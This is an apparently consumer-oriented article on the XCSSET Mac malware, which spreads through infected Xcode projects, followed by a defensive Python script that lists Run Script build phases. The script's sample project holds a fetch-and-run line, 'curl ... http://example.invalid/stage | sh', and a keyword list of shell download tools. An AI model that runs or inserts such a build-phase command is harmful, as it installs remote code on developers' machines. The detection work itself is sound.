What Mac Users Should Know About the New ‘XCSSET’ Malware

If you’re a Mac developer, or you like to try out new apps by building Xcode projects, there’s a serious strain of malware you need to be aware of: XCSSET.

Cybersecurity firm Trend Micro published a report detailing how attackers can use XCSSET to take over a user’s browser and steal their personal data, account passwords, and saved payment information. But it’s not just the attack’s potential severity that makes this malware so serious; it’s also the novel way it sneaks onto a user’s device.

XCSSET is installed via a trojan that hides in Xcode projects. For those who don’t know, Xcode is a free development tool used to create Apple apps on Mac, and Xcode projects are turned into the apps you run on your devices through a process called “building.”

When a developer builds an app from an infected Xcode project, the trojan quietly runs malicious code during the build that installs XCSSET on the developer’s system. Trend Micro says it’s unclear where these modified projects originate, but developers could be unwittingly spreading XCSSET by sharing Xcode projects without realising they’re infected.

The immediate threat is to developers, but general users are also at risk. Many open-source Mac apps are distributed as buildable Xcode projects that users can download and build themselves — and once the build runs the trojan, it’s game over, man.

How bad is XCSSET?

Here’s everything XCSSET does once it’s installed, according to Trend Micro’s report:

  • Uses a vulnerability to read and dump Safari cookies
  • Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack
  • It steals information from the user’s Evernote, Notes, Skype, Telegram, QQ, and WeChat apps
  • It takes screenshots of the user’s current screen
  • It uploads files from the affected machines to the attacker’s specified server
  • It encrypts files and shows a ransom note, if commanded by the server

Trend Micro also says the malware’s “UXSS” attack is theoretically able to take over the user’s web browser in numerous ways, including:

  • Modifying displayed websites
  • Modifying/replacing Bitcoin/cryptocurrency addresses
  • Stealing amoCRM, Apple ID, Google, PayPal, SIPMarket, and Yandex credentials
  • Stealing credit card information from the Apple Store
  • Blocking the user from changing passwords but also stealing newly modified passwords
  • Capturing screenshots of certain accessed sites

How to avoid the XCSSET Mac malware

The XCSSET malware is scary — and devilishly clever — but it’s mostly avoidable for regular users. Only download apps from official app stores and other verified sources, and use comprehensive anti-malware software. Yes, even on your Mac.

Developers should be cautious about how and where they share and obtain Xcode projects. Since the modified project files are difficult to spot and no one is quite sure where the trojan originates, even legitimate, trusted sources could be compromised. Trusted sources are still the safer bet; just don’t treat them as a guarantee. For those interested, Trend Micro’s report includes a technical brief that explains how XCSSET works, which may help you keep your projects safe.
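One concrete check a developer can run before building a project from an untrusted source, added here as an example (it is not from the article or from Trend Micro’s report, and it is not a signature for XCSSET specifically): list every Run Script build phase in the project’s project.pbxproj, because those phases execute arbitrary shell commands every time the project is built. The project fragment below is constructed for the example, and the list of suspicious tokens is a hand-picked heuristic, not a malware detector.

```python
import re
from pathlib import Path

# Constructed sample project.pbxproj fragment (not from any real project):
# one ordinary Sources phase and two Run Script phases. In a real checkout
# the file is <App>.xcodeproj/project.pbxproj.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        AA0001 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
        };
        AA0002 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "curl -fsSL http://example.invalid/stage | sh\n";
        };
        AA0003 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "Lint";
            shellPath = /bin/sh;
            shellScript = "\"${SRCROOT}/scripts/lint.sh\"\n";
        };
    };
}
'''

# A Run Script phase is an object whose isa is PBXShellScriptBuildPhase.
# Capture the rest of that object's body, up to its closing "};".
PHASE_RE = re.compile(
    r'isa\s*=\s*PBXShellScriptBuildPhase;(.*?)(?=\n\s*\};)', re.S)
# key = value; where value is a quoted string (with \-escapes) or a bare token.
FIELD_RE = re.compile(r'(\w+)\s*=\s*("(?:[^"\\]|\\.)*"|[^;]+);')

# Heuristic markers that deserve a manual look in a build script.
# This is a review aid, not a malware signature.
SUSPICIOUS = ('curl ', 'wget ', '| sh', '| bash', 'osascript', 'base64',
              'python -c', 'eval ', 'chmod +x', '/tmp/')


def _unquote(value: str) -> str:
    """Strip surrounding quotes and decode pbxproj backslash escapes."""
    value = value.strip()
    if not (value.startswith('"') and value.endswith('"')):
        return value
    escapes = {'n': '\n', 't': '\t'}
    return re.sub(r'\\(.)', lambda m: escapes.get(m.group(1), m.group(1)),
                  value[1:-1])


def run_script_phases(pbxproj_text: str) -> list[dict]:
    """Return each Run Script phase: name, interpreter, script text, heuristic flags."""
    phases = []
    for match in PHASE_RE.finditer(pbxproj_text):
        fields = {k: _unquote(v) for k, v in FIELD_RE.findall(match.group(1))}
        script = fields.get('shellScript', '')
        phases.append({
            'name': fields.get('name', '(unnamed)'),
            'shellPath': fields.get('shellPath', '/bin/sh'),
            'script': script,
            'flags': [tok for tok in SUSPICIOUS if tok in script],
        })
    return phases


def audit_project(pbxproj_path: str) -> list[dict]:
    """Read <App>.xcodeproj/project.pbxproj from disk and list its Run Script phases."""
    return run_script_phases(Path(pbxproj_path).read_text(encoding='utf-8'))


if __name__ == '__main__':
    import sys
    text = (Path(sys.argv[1]).read_text(encoding='utf-8')
            if len(sys.argv) > 1 else SAMPLE_PBXPROJ)
    for phase in run_script_phases(text):
        marker = 'REVIEW' if phase['flags'] else 'ok'
        print(f"[{marker}] {phase['name']} ({phase['shellPath']}):")
        print('    ' + phase['script'].rstrip('\n').replace('\n', '\n    '))
```

Run it as `python audit_pbxproj.py MyApp.xcodeproj/project.pbxproj` and read every script it prints rather than trusting the flags. Run Script phases are only one place a project can execute code during a build: scheme pre- and post-actions in the `.xcscheme` files under `xcshareddata/xcschemes` (and per-user `xcuserdata`) and custom build rules also run scripts, so check those too, and diff the project file against a known-good copy when one exists.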
